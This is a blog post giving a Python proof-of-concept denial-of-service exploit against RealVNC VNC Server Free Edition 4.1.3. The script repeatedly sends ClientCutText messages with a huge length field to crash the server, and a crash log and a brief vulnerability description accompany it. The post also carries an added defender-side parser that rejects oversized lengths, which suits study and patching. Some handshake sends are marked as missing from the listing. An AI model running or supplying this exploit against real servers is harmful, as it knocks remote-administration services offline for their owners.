
Sunday, May 2, 2010

RealVNC VNC Server Free Edition 4.1.3 Denial Of Service

Sending a ClientCutText Message with a length of 0xFFFFFFFF crashes the server with the exception shown below. Note: while the vulnerability is present regardless of authentication, for the sake of simplicity this script only works on servers configured to run with no authentication.

winvnc4.exe: The instruction at 0x425BE4 referenced memory at 0xFFFFFF00. The memory could not be written (0x00425BE4 -> FFFFFF00)

import sys, struct, socket

host = 'localhost'
port = 5900

def crash_vnc_server():
    while 1:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))

            print 'Connected'

            try:
                # RFB handshake: ProtocolVersion, Security, SecurityResult
                b = s.recv(8192)
                print 'ProtocolVersion Received'

                # (the client's ProtocolVersion reply is not shown in the original listing)
                print 'ProtocolVersion Sent'

                b = s.recv(8192)
                print 'Security Received'

                # (the client's security-type reply is not shown in the original listing)
                print 'Security Sent'

                b = s.recv(8192)
                print 'SecurityResult Received'

                # A SecurityResult of four zero bytes means OK (no authentication)
                if (len(b) == 4 and
                    b[0] == chr(0) and
                    b[1] == chr(0) and
                    b[2] == chr(0) and
                    b[3] == chr(0)):
                    print 'SecurityResult OK'
                else:
                    print 'SecurityResult Failed.\n\nThe server must be set '\
                          'to No Authentication for this to work, otherwise '\
                          'you\'ll need to write the necessary client side '\
                          'authentication code yourself.'

                # (the ClientInit send is not shown in the original listing)
                print 'ClientInit Sent'

                b = s.recv(8192)
                print 'ServerInit Received'

                # The length is packed in native (little-endian) byte order, so a
                # big-endian RFB reader sees 0xFFFFFF00 rather than 0x00FFFFFF
                text_len = 0xFFFFFF
                text_str = struct.pack('L', text_len) + '\xAA' * text_len

                while 1:
                    # ClientCutText: type 6, three padding bytes, length, text
                    s.send('\x06\x00\x00\x00' + text_str)

                    print 'ClientCutText Sent'

            except Exception:
                print 'Connection closed'

        except Exception:
            print 'Couldn\'t connect'
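As an added, defender-side example (not from the original post or from RealVNC): a Python 3 parser for the ClientCutText header that bounds the length field before anything is allocated or read, together with a helper that shows what the script above actually puts on the wire for the length. The 1 MiB cap, the exception class and the helper names are assumptions made for this example.

```python
import struct

CLIENT_CUT_TEXT = 6
# Assumed upper bound for this example: RFB itself puts no limit on the
# ClientCutText length, which is exactly why a server must choose one.
MAX_CUT_TEXT = 1 << 20  # 1 MiB

class RfbProtocolError(Exception):
    pass

def parse_client_cut_text(msg, max_len=MAX_CUT_TEXT):
    """Parse a ClientCutText message (RFC 6143 section 7.5.6): 1 byte type,
    3 bytes padding, 4 byte big-endian length, then the text.  The length
    is checked against the cap before any copy, so a hostile value such as
    0xFFFFFFFF is rejected instead of trusted."""
    if len(msg) < 8:
        raise RfbProtocolError("short ClientCutText header")
    msg_type, length = struct.unpack("!B3xI", msg[:8])
    if msg_type != CLIENT_CUT_TEXT:
        raise RfbProtocolError("not a ClientCutText message: type %d" % msg_type)
    if length > max_len:
        raise RfbProtocolError("ClientCutText length 0x%08X exceeds cap" % length)
    if len(msg) < 8 + length:
        raise RfbProtocolError("ClientCutText body truncated")
    return msg[8:8 + length].decode("latin-1")

def is_rejected(msg):
    """True if the parser refuses the message (used by the checks below)."""
    try:
        parse_client_cut_text(msg)
    except RfbProtocolError:
        return True
    return False

def page_script_wire_length():
    """Reproduce the length bytes the script above emits: struct.pack('L',
    0xFFFFFF) on the 32-bit little-endian build it targets gives
    ff ff ff 00, which a big-endian RFB reader interprets as 0xFFFFFF00,
    the same value that appears as the faulting address in the crash."""
    raw = struct.pack("<L", 0xFFFFFF)
    return struct.unpack("!I", raw)[0]

def build_client_cut_text(text, wire_len=None):
    """Constructed helper: encode a ClientCutText message; wire_len lets a
    check forge a header length that disagrees with the real body size."""
    body = text.encode("latin-1")
    n = len(body) if wire_len is None else wire_len
    return struct.pack("!B3xI", CLIENT_CUT_TEXT, n) + body
```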



  1. RealVNC (Virtual Network Computing) allows users to access remote computers for administration purposes.

    RealVNC is prone to a remote denial-of-service vulnerability. Specifically the issue occurs when a 'ClientCutText' message with length 0xFFFFFFFF is sent to the server.

